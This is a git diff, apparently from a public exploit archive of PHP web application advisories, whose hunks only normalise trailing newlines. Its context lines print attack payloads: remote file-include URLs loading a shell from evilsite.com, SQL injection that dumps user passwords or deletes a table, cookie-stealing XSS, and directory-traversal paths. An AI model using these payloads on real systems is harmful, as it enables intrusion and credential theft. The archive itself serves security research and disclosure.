b/platforms/php/webapps/29525.txt @@ -43,4 +43,4 @@ Your File:
File Access : -http://site-target/uploads/[years]/[month]/ > find your shell +http://site-target/uploads/[years]/[month]/ > find your shell \ No newline at end of file diff --git a/platforms/php/webapps/2953.php b/platforms/php/webapps/2953.php index e8447953c..5719be103 100755 --- a/platforms/php/webapps/2953.php +++ b/platforms/php/webapps/2953.php @@ -193,4 +193,4 @@ else { } ?> -# milw0rm.com [2006-12-19] +# milw0rm.com [2006-12-19] \ No newline at end of file diff --git a/platforms/php/webapps/29544.txt b/platforms/php/webapps/29544.txt index 552c796ea..e03c57ac9 100755 --- a/platforms/php/webapps/29544.txt +++ b/platforms/php/webapps/29544.txt @@ -51,4 +51,4 @@ risk management solutions. Our team has expert skills in assessment and assurance, strategy and architecture, and deployment through to ongoing management. We are Australia's premier application penetration testing firm and trusted IT security advisor to many of the country's -largest organisations. +largest organisations. \ No newline at end of file diff --git a/platforms/php/webapps/2955.txt b/platforms/php/webapps/2955.txt index 30f5e9833..4f8702375 100755 --- a/platforms/php/webapps/2955.txt +++ b/platforms/php/webapps/2955.txt @@ -22,4 +22,4 @@ + http://[target]/[path]/music/buycd.php?HTTP_DOCUMENT_ROOT=http://evilsite.com/shell.php? +------------------------------------------------------------------------------------------- -# milw0rm.com [2006-12-19] +# milw0rm.com [2006-12-19] \ No newline at end of file diff --git a/platforms/php/webapps/2956.txt b/platforms/php/webapps/2956.txt index 39b749b66..85219d3ae 100755 --- a/platforms/php/webapps/2956.txt +++ b/platforms/php/webapps/2956.txt @@ -39,4 +39,4 @@ + http://[target]/[path]/include/menu_v.inc.php?incpath=http://evilsite.com/shell.php? +------------------------------------------------------------------------------------------- -# milw0rm.com [2006-12-19] +# milw0rm.com [2006-12-19] \ No newline at end of file diff --git a/platforms/php/webapps/2957.txt b/platforms/php/webapps/2957.txt index 20805a0af..cac1ec4f7 100755 --- a/platforms/php/webapps/2957.txt +++ b/platforms/php/webapps/2957.txt @@ -130,4 +130,4 @@ http://www.smileygenerator.us/smileysig2/links/918742001154432992.final.gif --------------------------------------|| Viva Palestine ||----------------------------------------- --------------------------------------|| Free Saddam Hussien ||----------------------------------------- -# milw0rm.com [2006-12-19] +# milw0rm.com [2006-12-19] \ No newline at end of file diff --git a/platforms/php/webapps/2958.txt b/platforms/php/webapps/2958.txt index 9eec23f0d..6923dcc30 100755 --- a/platforms/php/webapps/2958.txt +++ b/platforms/php/webapps/2958.txt @@ -21,4 +21,4 @@ Usage: http://[target]/[cwm_vote_path]/archive.php?abs=http://[Shellscript] Greetings: TheJT, Lu7k, Kacper, nukedx, str0ke -# milw0rm.com [2006-12-19] +# milw0rm.com [2006-12-19] \ No newline at end of file diff --git a/platforms/php/webapps/2960.pl b/platforms/php/webapps/2960.pl index fcb3565dc..9a974725a 100755 --- a/platforms/php/webapps/2960.pl +++ b/platforms/php/webapps/2960.pl @@ -73,4 +73,4 @@ sub usage() exit(); } -# milw0rm.com [2006-12-19] +# milw0rm.com [2006-12-19] \ No newline at end of file diff --git a/platforms/php/webapps/29608.txt b/platforms/php/webapps/29608.txt index 624ddc9d3..16673aff6 100755 --- a/platforms/php/webapps/29608.txt +++ b/platforms/php/webapps/29608.txt @@ -6,5 +6,4 @@ An attacker can exploit this issue to execute arbitrary PHP code in the context This issue affects version 1.31; prior versions may also be affected. -http://www.example.com/cedstat/index.php?hier=%3C%68%31%3E%74%65%73%74%65%64%20%62%79%20%73%6E%30%6F%50%79%3C%2F%68%31%3E - +http://www.example.com/cedstat/index.php?hier=%3C%68%31%3E%74%65%73%74%65%64%20%62%79%20%73%6E%30%6F%50%79%3C%2F%68%31%3E \ No newline at end of file diff --git a/platforms/php/webapps/29610.txt b/platforms/php/webapps/29610.txt index 3cfcc3bea..745bf3a4d 100755 --- a/platforms/php/webapps/29610.txt +++ b/platforms/php/webapps/29610.txt @@ -3,5 +3,4 @@ source: http://www.securityfocus.com/bid/22590/info Ezboo webstats is prone to a vulnerability that will let attackers gain administrative access to the application because it fails to properly validate access. http://www.example.com/ezwebstats/update.php -http://www.example.com/ezwebstats/config.php - +http://www.example.com/ezwebstats/config.php \ No newline at end of file diff --git a/platforms/php/webapps/29615.txt b/platforms/php/webapps/29615.txt index 1bd997ef4..06b573832 100755 --- a/platforms/php/webapps/29615.txt +++ b/platforms/php/webapps/29615.txt @@ -8,5 +8,4 @@ This issue affects Powerschool 4.3.6; other versions may also be affected. UPDATE: Powerschool 5.1.2 is also reportedly affected by this issue, in a limited fashion. -http://www.example.com/admin/.js - +http://www.example.com/admin/.js \ No newline at end of file diff --git a/platforms/php/webapps/29627.php b/platforms/php/webapps/29627.php index 7ade82bf7..bfe8f1f16 100755 --- a/platforms/php/webapps/29627.php +++ b/platforms/php/webapps/29627.php @@ -72,5 +72,4 @@ You Got Your Own PHP Shell\n/* Visit us : WwW.SoQoR.NeT WwW.SoQoR.NeT */\n/**********************************************/"); } -?> - +?> \ No newline at end of file diff --git a/platforms/php/webapps/29634.txt b/platforms/php/webapps/29634.txt index 0916a1987..19ac35fdf 100755 --- a/platforms/php/webapps/29634.txt +++ b/platforms/php/webapps/29634.txt @@ -6,5 +6,4 @@ Attackers can exploit the local file-include vulnerability using directory-trave Exploiting these issues may allow attackers to compromise the application and the underlying system or to access sensitive information; other attacks are also possible. -http://www.example.com/zadminxx/list_main_pages.php?nfolder=/etc/ - +http://www.example.com/zadminxx/list_main_pages.php?nfolder=/etc/ \ No newline at end of file diff --git a/platforms/php/webapps/2964.txt b/platforms/php/webapps/2964.txt index 290b9f014..212e5b996 100755 --- a/platforms/php/webapps/2964.txt +++ b/platforms/php/webapps/2964.txt @@ -43,4 +43,4 @@ ******************* * ********************************************************************************************** -# milw0rm.com [2006-12-20] +# milw0rm.com [2006-12-20] \ No newline at end of file diff --git a/platforms/php/webapps/29643.txt b/platforms/php/webapps/29643.txt index 701b51102..b4ab90757 100755 --- a/platforms/php/webapps/29643.txt +++ b/platforms/php/webapps/29643.txt @@ -4,4 +4,4 @@ Simple one-file gallery is prone to multiple input-validation vulnerabilities, i An attacker can exploit these issues to steal cookie-based authentication credentials and to view and execute arbitrary local files within the context of the affected webserver. Other attacks are also possible. -http://www.example.com/gallery.php?f=[xss] +http://www.example.com/gallery.php?f=[xss] \ No newline at end of file diff --git a/platforms/php/webapps/29647.txt b/platforms/php/webapps/29647.txt index 18a49438b..ec13e301e 100755 --- a/platforms/php/webapps/29647.txt +++ b/platforms/php/webapps/29647.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Active Calendar 1.2.0 is vulnerable; other versions may also be affected. -http://www.example.com/activecalendar/data/js.php?css="> +http://www.example.com/activecalendar/data/js.php?css="> \ No newline at end of file diff --git a/platforms/php/webapps/29649.txt b/platforms/php/webapps/29649.txt index 9f7580103..8b96c7f84 100755 --- a/platforms/php/webapps/29649.txt +++ b/platforms/php/webapps/29649.txt @@ -6,4 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Active Calendar 1.2.0 is vulnerable; other versions may also be affected. -http://www.example.com/activecalendar/data/m_3.php?css="> +http://www.example.com/activecalendar/data/m_3.php?css="> \ No newline at end of file diff --git a/platforms/php/webapps/2965.txt b/platforms/php/webapps/2965.txt index 84df9d9f3..39f25e4aa 100755 --- a/platforms/php/webapps/2965.txt +++ b/platforms/php/webapps/2965.txt @@ -21,4 +21,4 @@ + http://[target]/[path]/config/sender.php?ROOT_PATH=http://evilsite.com/shell.php? +------------------------------------------------------------------------------------------- -# milw0rm.com [2006-12-20] +# milw0rm.com [2006-12-20] \ No newline at end of file diff --git a/platforms/php/webapps/29650.txt b/platforms/php/webapps/29650.txt index 7b19c7264..d4fec43e2 100755 --- a/platforms/php/webapps/29650.txt +++ b/platforms/php/webapps/29650.txt @@ -6,5 +6,4 @@ An attacker may leverage these issues to execute arbitrary script code in the br Active Calendar 1.2.0 is vulnerable; other versions may also be affected. -http://www.example.com/activecalendar/data/m_4.php?css="> - +http://www.example.com/activecalendar/data/m_4.php?css="> \ No newline at end of file diff --git a/platforms/php/webapps/29672.txt b/platforms/php/webapps/29672.txt index 8837e0061..de7ff13dd 100755 --- a/platforms/php/webapps/29672.txt +++ b/platforms/php/webapps/29672.txt @@ -82,4 +82,4 @@ https://www.livezilla.net/downloads/pubfiles/LiveZilla_5.1.0.0_Full.exe 18.10.2013 Informed Vendor about Issue 12.11.2013 Vendor informed about the fixed new version -15.11.2013 Disclosed to public +15.11.2013 Disclosed to public \ No newline at end of file diff --git a/platforms/php/webapps/29676.txt b/platforms/php/webapps/29676.txt index 60364e1fa..e722b3b2f 100755 --- a/platforms/php/webapps/29676.txt +++ b/platforms/php/webapps/29676.txt @@ -4,4 +4,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica Audins Audiens version 3.3 is vulnerable; other versions may also be affected. -http://www.example.com/[path]/unistall.php?cnf=disinstalla&status=on +http://www.example.com/[path]/unistall.php?cnf=disinstalla&status=on \ No newline at end of file diff --git a/platforms/php/webapps/2968.php b/platforms/php/webapps/2968.php index 4dd38adeb..1e7a72628 100755 --- a/platforms/php/webapps/2968.php +++ b/platforms/php/webapps/2968.php @@ -111,4 +111,4 @@ print $exp; } ?> -# milw0rm.com [2006-12-20] +# milw0rm.com [2006-12-20] \ No newline at end of file diff --git a/platforms/php/webapps/2969.txt b/platforms/php/webapps/2969.txt index 1063f698f..8232057f2 100755 --- a/platforms/php/webapps/2969.txt +++ b/platforms/php/webapps/2969.txt @@ -14,4 +14,4 @@ # Greetz: str0ke , Dr Max Virus , Kacper ######################################################################## -# milw0rm.com [2006-12-21] +# milw0rm.com [2006-12-21] \ No newline at end of file diff --git a/platforms/php/webapps/2970.txt b/platforms/php/webapps/2970.txt index 833e0cdcd..7c3000613 100755 --- a/platforms/php/webapps/2970.txt +++ b/platforms/php/webapps/2970.txt @@ -17,4 +17,4 @@ #Special Gr33ts:AsianEagle & The master & Kacper & Hotturk # ########################################################################################### -# milw0rm.com [2006-12-21] +# milw0rm.com [2006-12-21] \ No newline at end of file diff --git a/platforms/php/webapps/29700.txt b/platforms/php/webapps/29700.txt index aead05d57..e9bbdc2fe 100755 --- a/platforms/php/webapps/29700.txt +++ b/platforms/php/webapps/29700.txt @@ -106,5 +106,4 @@ document.cookie) -EOF - +EOF \ No newline at end of file diff --git a/platforms/php/webapps/29703.txt b/platforms/php/webapps/29703.txt index 4bfd525ae..7a01da9c3 100755 --- a/platforms/php/webapps/29703.txt +++ b/platforms/php/webapps/29703.txt @@ -4,4 +4,4 @@ Tyger Bug Tracking System is prone to multiple input-validation vulnerabilities, Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, retrieve and overwrite sensitive information, access or modify data, or exploit latent vulnerabilities in the underlying database implementation. -http://www.example.com/ViewBugs.php?s=[sql]&o=ASC +http://www.example.com/ViewBugs.php?s=[sql]&o=ASC \ No newline at end of file diff --git a/platforms/php/webapps/2971.txt b/platforms/php/webapps/2971.txt index 85a2ccb92..223ea6f7f 100755 --- a/platforms/php/webapps/2971.txt +++ b/platforms/php/webapps/2971.txt @@ -40,4 +40,4 @@ + http://[target]/[path]/form_header.php?errormsg=1&CFG[localelangdir]=http://evilsite.com/shell.php? +------------------------------------------------------------------------------------------- -# milw0rm.com [2006-12-21] +# milw0rm.com [2006-12-21] \ No newline at end of file diff --git a/platforms/php/webapps/29729.txt b/platforms/php/webapps/29729.txt index 605a0245f..809660932 100755 --- a/platforms/php/webapps/29729.txt +++ b/platforms/php/webapps/29729.txt @@ -4,4 +4,4 @@ Premod SubDog 2 is prone to multiple remote file-include vulnerabilities. An attacker can exploit these issues to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible. -http://www.example.com/[path]/includes/logger_engine.php?phpbb_root_path=[Shell-Attack] +http://www.example.com/[path]/includes/logger_engine.php?phpbb_root_path=[Shell-Attack] \ No newline at end of file diff --git a/platforms/php/webapps/2973.txt b/platforms/php/webapps/2973.txt index 158676add..e18bfdd0e 100755 --- a/platforms/php/webapps/2973.txt +++ b/platforms/php/webapps/2973.txt @@ -21,4 +21,4 @@ + http://[target]/[path]/footer.inc.php?settings[footer]=http://evilsite.com/shell.php +------------------------------------------------------------------------------------------- -# milw0rm.com [2006-12-21] +# milw0rm.com [2006-12-21] \ No newline at end of file diff --git a/platforms/php/webapps/2975.pl b/platforms/php/webapps/2975.pl index 01ef19817..7ab13d543 100755 --- a/platforms/php/webapps/2975.pl +++ b/platforms/php/webapps/2975.pl @@ -195,4 +195,4 @@ sub concatchar() { return $temp; } -# milw0rm.com [2006-12-21] +# milw0rm.com [2006-12-21] \ No newline at end of file diff --git a/platforms/php/webapps/29750.php b/platforms/php/webapps/29750.php index f29b923da..33fb47efb 100755 --- a/platforms/php/webapps/29750.php +++ b/platforms/php/webapps/29750.php @@ -162,4 +162,4 @@ $t2=explode("-->",$t[1]); $pass=$t2[0]; echo "admin pass -> ".$pass."\n"; -?> +?> \ No newline at end of file diff --git a/platforms/php/webapps/29751.php b/platforms/php/webapps/29751.php index a170828d5..788db602a 100755 --- a/platforms/php/webapps/29751.php +++ b/platforms/php/webapps/29751.php @@ -192,4 +192,4 @@ $packet.="Connection: Close\r\n\r\n"; send($packet); $temp=explode("",$html); echo $temp[0]; -?> +?> \ No newline at end of file diff --git a/platforms/php/webapps/29754.html b/platforms/php/webapps/29754.html index c7953c55b..ac2c80908 100755 --- a/platforms/php/webapps/29754.html +++ b/platforms/php/webapps/29754.html @@ -27,4 +27,4 @@ An attacker may leverage this issue to execute arbitrary script code in the brow // ]]> - + \ No newline at end of file diff --git a/platforms/php/webapps/29756.txt b/platforms/php/webapps/29756.txt index a8eee9074..8c65650c2 100755 --- a/platforms/php/webapps/29756.txt +++ b/platforms/php/webapps/29756.txt @@ -4,4 +4,4 @@ PHPX is prone to multiple input-validation vulnerabilities because the applicati Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, execute arbitrary script code in the context of the webserver process, compromise the application, obtain sensitive information, access or modify data, or exploit latent vulnerabilities in the underlying database implementation. -http://www.example.com/phpx/print.php?action=news&news_id=' +http://www.example.com/phpx/print.php?action=news&news_id=' \ No newline at end of file diff --git a/platforms/php/webapps/29758.txt b/platforms/php/webapps/29758.txt index 8b4127f15..00b7e9946 100755 --- a/platforms/php/webapps/29758.txt +++ b/platforms/php/webapps/29758.txt @@ -4,4 +4,4 @@ PHPX is prone to multiple input-validation vulnerabilities because the applicati Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, execute arbitrary script code in the context of the webserver process, compromise the application, obtain sensitive information, access or modify data, or exploit latent vulnerabilities in the underlying database implementation. -http://www.example.com/phpx/users.php?action=view&user_id=' +http://www.example.com/phpx/users.php?action=view&user_id=' \ No newline at end of file diff --git a/platforms/php/webapps/29759.php b/platforms/php/webapps/29759.php index b624c4fb1..feb2024a4 100755 --- a/platforms/php/webapps/29759.php +++ b/platforms/php/webapps/29759.php @@ -193,5 +193,4 @@ class search exit; } } -} - +} \ No newline at end of file diff --git a/platforms/php/webapps/2976.txt b/platforms/php/webapps/2976.txt index 105a817c9..a91fbd986 100755 --- a/platforms/php/webapps/2976.txt +++ b/platforms/php/webapps/2976.txt @@ -20,4 +20,4 @@ Code: require ("$inews_path/inertia_sql_class.php"); Special-Greetz: ajann, Kacper, Google-Team :-) -# milw0rm.com [2006-12-21] +# milw0rm.com [2006-12-21] \ No newline at end of file diff --git a/platforms/php/webapps/29763.php b/platforms/php/webapps/29763.php index affd0bf97..bfb0c8437 100755 --- a/platforms/php/webapps/29763.php +++ b/platforms/php/webapps/29763.php @@ -156,4 +156,4 @@ else echo "+---------------------------------------------------------------+\r\n"; echo "\n\n"; } -?> +?> \ No newline at end of file diff --git a/platforms/php/webapps/2977.txt b/platforms/php/webapps/2977.txt index 2de13a570..6d5df0504 100755 --- a/platforms/php/webapps/2977.txt +++ b/platforms/php/webapps/2977.txt @@ -9,4 +9,4 @@ posting [img]?ind=urlobox&op=delete&idurlo=X[/img] in MkPortal urlobox where X is an ID of a message, when administrator opens urlobox page message X will be erased. -# milw0rm.com [2006-12-21] +# milw0rm.com [2006-12-21] \ No newline at end of file diff --git a/platforms/php/webapps/29772.txt b/platforms/php/webapps/29772.txt index ac65121c6..1b1586f8b 100755 --- a/platforms/php/webapps/29772.txt +++ b/platforms/php/webapps/29772.txt @@ -10,4 +10,4 @@ This BID was incorrectly reporting Free File Upload script as the affected packa This issue is related to BID 20781 - Free File Hosting Forgot_Pass.PHP Remote File Include Vulnerability. -http://www.example.com/contact.php?AD_BODY_TEMP=http://www.example2.com +http://www.example.com/contact.php?AD_BODY_TEMP=http://www.example2.com \ No newline at end of file diff --git a/platforms/php/webapps/29786.txt b/platforms/php/webapps/29786.txt index 2ab4b5103..d94585d30 100755 --- a/platforms/php/webapps/29786.txt +++ b/platforms/php/webapps/29786.txt @@ -4,4 +4,4 @@ aBitWhizzy is prone to multiple cross-site scripting and directory-traversal vul An attacker could exploit these vulnerabilities to view the directory structure on the affected webserver and perform cross-site scripting attacks on unsuspecting users in the context of the affected website. This may help the attacker steal cookie-based authentication credentials and launch other attacks. -http://localhost/abitwhizzy/whizzylink.php?d= ../../../../../../../Documents%20and%20Settings +http://localhost/abitwhizzy/whizzylink.php?d= ../../../../../../../Documents%20and%20Settings \ No newline at end of file diff --git a/platforms/php/webapps/29789.txt b/platforms/php/webapps/29789.txt index 18e5715d0..c16bc49ad 100755 --- a/platforms/php/webapps/29789.txt +++ b/platforms/php/webapps/29789.txt @@ -83,4 +83,4 @@ Cookie: PHPSESSID=dqbs2pqhq9f2ckn24rreja1sl1 group_name=Zero+Science+Lab'&action=usergroupindb ----------------------------------------------------------------------------------- +---------------------------------------------------------------------------------- \ No newline at end of file diff --git a/platforms/php/webapps/2979.txt b/platforms/php/webapps/2979.txt index e50c7ef96..9a2357642 100755 --- a/platforms/php/webapps/2979.txt +++ b/platforms/php/webapps/2979.txt @@ -54,4 +54,4 @@ So this is only vulnerable for CGI PHP versions. /str0ke -# milw0rm.com [2006-12-22] +# milw0rm.com [2006-12-22] \ No newline at end of file diff --git a/platforms/php/webapps/29790.txt b/platforms/php/webapps/29790.txt index 5dd243c64..23c990b3e 100755 --- a/platforms/php/webapps/29790.txt +++ b/platforms/php/webapps/29790.txt @@ -58,4 +58,4 @@ style=" "> onerror=prompt(document.cookie);>
 
-
    +
      \ No newline at end of file diff --git a/platforms/php/webapps/2980.txt b/platforms/php/webapps/2980.txt index 24255c7b4..aedc42aeb 100755 --- a/platforms/php/webapps/2980.txt +++ b/platforms/php/webapps/2980.txt @@ -36,4 +36,4 @@ ******************* * ********************************************************************************************** -# milw0rm.com [2006-12-22] +# milw0rm.com [2006-12-22] \ No newline at end of file diff --git a/platforms/php/webapps/29806.pl b/platforms/php/webapps/29806.pl index ebf2e5f8b..6fe8a9ab9 100755 --- a/platforms/php/webapps/29806.pl +++ b/platforms/php/webapps/29806.pl @@ -58,5 +58,4 @@ print "\n# Connect to : $ARGV[0]\n"; $xmie=~m/(.*?)<\/td>/ && print "\n# Admin name : $1\n"; print "\n# Exploit Failed\n" if(!$1); -$xmie=~m/(.*?)<\/b><\/font><\/td>/ && print "\n# Password : $1\n"; - +$xmie=~m/(.*?)<\/b><\/font><\/td>/ && print "\n# Password : $1\n"; \ No newline at end of file diff --git a/platforms/php/webapps/2981.php b/platforms/php/webapps/2981.php index 0b8705d57..90bd56f03 100755 --- a/platforms/php/webapps/2981.php +++ b/platforms/php/webapps/2981.php @@ -285,4 +285,4 @@ break; } ?> -# milw0rm.com [2006-12-23] +# milw0rm.com [2006-12-23] \ No newline at end of file diff --git a/platforms/php/webapps/2982.txt b/platforms/php/webapps/2982.txt index 339d7079d..262284f0c 100755 --- a/platforms/php/webapps/2982.txt +++ b/platforms/php/webapps/2982.txt @@ -20,4 +20,4 @@ *special gr33ts:AsianEagle -The master -Kacper -Hotturk * ************************************************************************ -# milw0rm.com [2006-12-22] +# milw0rm.com [2006-12-22] \ No newline at end of file diff --git a/platforms/php/webapps/29827.pl b/platforms/php/webapps/29827.pl index 5a591b830..7d50dd96e 100755 --- a/platforms/php/webapps/29827.pl +++ b/platforms/php/webapps/29827.pl @@ -47,5 +47,4 @@ echo ''; } fclose($ac); } -?> - +?> \ No newline at end of file diff --git a/platforms/php/webapps/29828.html b/platforms/php/webapps/29828.html index a0805f9b9..f03085de7 100755 --- a/platforms/php/webapps/29828.html +++ b/platforms/php/webapps/29828.html @@ -24,4 +24,4 @@ Martinelli
      - + \ No newline at end of file diff --git a/platforms/php/webapps/2983.txt b/platforms/php/webapps/2983.txt index 2ff41e8a4..96126861f 100755 --- a/platforms/php/webapps/2983.txt +++ b/platforms/php/webapps/2983.txt @@ -36,4 +36,4 @@ ******************* * ********************************************************************************************** -# milw0rm.com [2006-12-23] +# milw0rm.com [2006-12-23] \ No newline at end of file diff --git a/platforms/php/webapps/29832.txt b/platforms/php/webapps/29832.txt index 1a4afcbe1..286bc5bd0 100755 --- a/platforms/php/webapps/29832.txt +++ b/platforms/php/webapps/29832.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to compromise the application, a These issues affect DropAFew 0.2; prior versions may also be affected. # delete foodfacts table -wget --load-cookies cookies --post-data='id=1%20OR%20id%20>%200--&action=del' http://[target]/calorie/search.php +wget --load-cookies cookies --post-data='id=1%20OR%20id%20>%200--&action=del' http://[target]/calorie/search.php \ No newline at end of file diff --git a/platforms/php/webapps/29834.txt b/platforms/php/webapps/29834.txt index bb02bbc70..9af631d74 100755 --- a/platforms/php/webapps/29834.txt +++ b/platforms/php/webapps/29834.txt @@ -26,6 +26,4 @@ http://127.0.0.1/wp-content/plugins/dzs-videogallery/admin/dzsuploader/upload/up _________________________________ -All http://www.mavi1.org members - - +All http://www.mavi1.org members \ No newline at end of file diff --git a/platforms/php/webapps/2984.txt b/platforms/php/webapps/2984.txt index 615302bad..83ba62393 100755 --- a/platforms/php/webapps/2984.txt +++ b/platforms/php/webapps/2984.txt @@ -77,4 +77,4 @@ sub usage() exit(); } -# milw0rm.com [2006-12-23] +# milw0rm.com [2006-12-23] \ No newline at end of file diff --git a/platforms/php/webapps/29849.html b/platforms/php/webapps/29849.html index 291a8da86..22c714056 100755 --- a/platforms/php/webapps/29849.html +++ b/platforms/php/webapps/29849.html @@ -9,4 +9,4 @@ This issue affects ToendaCMS 1.5.3; other versions may also be affected.
      -
      + \ No newline at end of file diff --git a/platforms/php/webapps/29852.txt b/platforms/php/webapps/29852.txt index b27927a8d..34f0ca21f 100755 --- a/platforms/php/webapps/29852.txt +++ b/platforms/php/webapps/29852.txt @@ -42,5 +42,4 @@ in photogallery page http://www.example.com/path/index.php?page=photos http://www.example.com/path/index.php?page=[XSS] example : - - + \ No newline at end of file diff --git a/platforms/php/webapps/29861.txt b/platforms/php/webapps/29861.txt index 683af7df9..8e04a3dae 100755 --- a/platforms/php/webapps/29861.txt +++ b/platforms/php/webapps/29861.txt @@ -117,4 +117,4 @@ Example html source code to CSRF POST a rogue cert : 93. } 94. 95. - 96. + 96. \ No newline at end of file diff --git a/platforms/php/webapps/29862.pl b/platforms/php/webapps/29862.pl index 377d37f94..228802502 100755 --- a/platforms/php/webapps/29862.pl +++ b/platforms/php/webapps/29862.pl @@ -106,5 +106,4 @@ while ($raspuns = <$socket>) print $raspuns; } print "[shell] "; -$cmd = ; - +$cmd = ; \ No newline at end of file diff --git a/platforms/php/webapps/29864.php b/platforms/php/webapps/29864.php index cb4b8fa56..32696c52f 100755 --- a/platforms/php/webapps/29864.php +++ b/platforms/php/webapps/29864.php @@ -190,5 +190,4 @@ if (strstr($html,"666999")) } # Coded With BH Fast Generator v0.1 -?> - +?> \ No newline at end of file diff --git a/platforms/php/webapps/29868.txt b/platforms/php/webapps/29868.txt index df3c3b7a2..b99295e0e 100755 --- a/platforms/php/webapps/29868.txt +++ b/platforms/php/webapps/29868.txt @@ -95,4 +95,4 @@ yahoo=xyz@xyz.com aol=xyz@xyz.com icq=xyz@xyz.com signature=xyz@xyz.com -coppa_state=over®ister_submit=Register +coppa_state=over®ister_submit=Register \ No newline at end of file diff --git a/platforms/php/webapps/29869.php b/platforms/php/webapps/29869.php index d440261cd..a4ec1eeea 100755 --- a/platforms/php/webapps/29869.php +++ b/platforms/php/webapps/29869.php @@ -78,4 +78,4 @@ RkZGRkZGIiBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj5vPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAw PSJWZXJkYW5hIiBzaXplPSIyIj5vPC9mb250Pjxmb250IGNvbG9yPSIjRkYwMDAwIiBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj5SPC9mb250Pjxmb250IGNvbG9yPSIjMDA4MDAwIiBmYWNlPSJWZXJkYW5hIiBzaXplP SIyIj5bRG9UXTwvZm9udD48Zm9udCBjb2xvcj0iI0ZGMDAwMCIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+TjwvZm9udD48Zm9udCBjb2xvcj0iI0ZGRkZGRiIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+ZTwvZm9udD4 8Zm9udCBjb2xvcj0iI0ZGMDAwMCIgZmFjZT0iVmVyZGFuYSIgc2l6ZT0iMiI+VDwvZm9udD48L2E+CjwvZGl2Pgo8L2JvZHk+")); -?> +?> \ No newline at end of file diff --git a/platforms/php/webapps/29877.html b/platforms/php/webapps/29877.html index 94632eea3..151395135 100755 --- a/platforms/php/webapps/29877.html +++ b/platforms/php/webapps/29877.html @@ -12,4 +12,4 @@ Website Manager"
      alert(1);"> -
      + \ No newline at end of file diff --git a/platforms/php/webapps/29888.txt b/platforms/php/webapps/29888.txt index b6f14696b..16b8baa94 100755 --- a/platforms/php/webapps/29888.txt +++ b/platforms/php/webapps/29888.txt @@ -7,4 +7,4 @@ Exploiting these issues could allow an attacker to steal cookie-based authentica Phorum 5.1.20 is affected; prior versions may also be vulnerable. http://localhost/phorum.5.1.20/admin.php?module=modsettings&mod=smileys& -edit=1&smiley_id="> +edit=1&smiley_id="> \ No newline at end of file diff --git a/platforms/php/webapps/29889.txt b/platforms/php/webapps/29889.txt index 46c35eaa0..9592fff51 100755 --- a/platforms/php/webapps/29889.txt +++ b/platforms/php/webapps/29889.txt @@ -56,4 +56,4 @@ Array "$userdata" is uninitialized. So we can "poison" that variable, if php set has "register_globals=on". And in this way user moderator can deliver for saving any userdata for any user. For example - userdata[admin] carries user admin privileges. -Solution: array initializing before use and adding some security checks. +Solution: array initializing before use and adding some security checks. \ No newline at end of file diff --git a/platforms/php/webapps/29890.txt b/platforms/php/webapps/29890.txt index 8d846504c..8bf0a92aa 100755 --- a/platforms/php/webapps/29890.txt +++ b/platforms/php/webapps/29890.txt @@ -9,4 +9,4 @@ Phorum 5.1.20 is affected; prior versions may also be vulnerable. http://localhost/phorum.5.1.20/admin.php?module[]=groups Warning: basename() expects parameter 1 to be string, array given in -C:\apache_wwwroot\phorum.5.1.20\admin.php on line 57 +C:\apache_wwwroot\phorum.5.1.20\admin.php on line 57 \ No newline at end of file diff --git a/platforms/php/webapps/29898.txt b/platforms/php/webapps/29898.txt index 291c402a7..3ff553d98 100755 --- a/platforms/php/webapps/29898.txt +++ b/platforms/php/webapps/29898.txt @@ -4,5 +4,4 @@ Plesk is prone to a directory-traversal vulnerability because it fails to proper An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the affected application. Information obtained may aid in further attacks. -https://www.example.com/login.php3?login_name=x&passwd=x&locale_id=../../../../../../../../boot.ini%00.jpg - +https://www.example.com/login.php3?login_name=x&passwd=x&locale_id=../../../../../../../../boot.ini%00.jpg \ No newline at end of file diff --git a/platforms/php/webapps/29921.py b/platforms/php/webapps/29921.py index 9a9395852..e1c47a681 100755 --- a/platforms/php/webapps/29921.py +++ b/platforms/php/webapps/29921.py @@ -26,4 +26,4 @@ print "Result" html = rta.read() rdo = str(re.findall("resources.*=*", html)) print rdo -exit +exit \ No newline at end of file diff --git a/platforms/php/webapps/29944.pl b/platforms/php/webapps/29944.pl index 32f930601..f2f2432fb 100755 --- a/platforms/php/webapps/29944.pl +++ b/platforms/php/webapps/29944.pl @@ -104,4 +104,4 @@ print " Thnx:h0tturk,Ekin0x,Gencnesil,Gencturk,Ajann print " ============================================================================\r\n"; exit(); -} +} \ No newline at end of file diff --git a/platforms/php/webapps/29955.txt b/platforms/php/webapps/29955.txt index 7d4e7fd47..996728547 100755 --- a/platforms/php/webapps/29955.txt +++ b/platforms/php/webapps/29955.txt @@ -7,6 +7,4 @@ Exploiting this issue could allow an attacker to compromise the application, acc WF-Quote 1.0 is vulnerable; other versions may also be affected. -http://www.example.com/modules/wfquotes/index.php?op=cat&c=1/**/UNION/**/SELECT/**/0,uname,pass,3,4,5/**/FROM/**/xoops_users/**/LIMIT/**/1,1/* - - +http://www.example.com/modules/wfquotes/index.php?op=cat&c=1/**/UNION/**/SELECT/**/0,uname,pass,3,4,5/**/FROM/**/xoops_users/**/LIMIT/**/1,1/* \ No newline at end of file diff --git a/platforms/php/webapps/2999.pl b/platforms/php/webapps/2999.pl index ca21f465c..c43c13629 100755 --- a/platforms/php/webapps/2999.pl +++ b/platforms/php/webapps/2999.pl @@ -91,4 +91,4 @@ sub main exit; } -# milw0rm.com [2006-12-24] +# milw0rm.com [2006-12-24] \ No newline at end of file diff --git a/platforms/php/webapps/29998.txt b/platforms/php/webapps/29998.txt index b55a5e2cf..80bba316e 100755 --- a/platforms/php/webapps/29998.txt +++ b/platforms/php/webapps/29998.txt @@ -7,4 +7,4 @@ Exploiting this issue allows remote attackers to execute code in the context of This issue 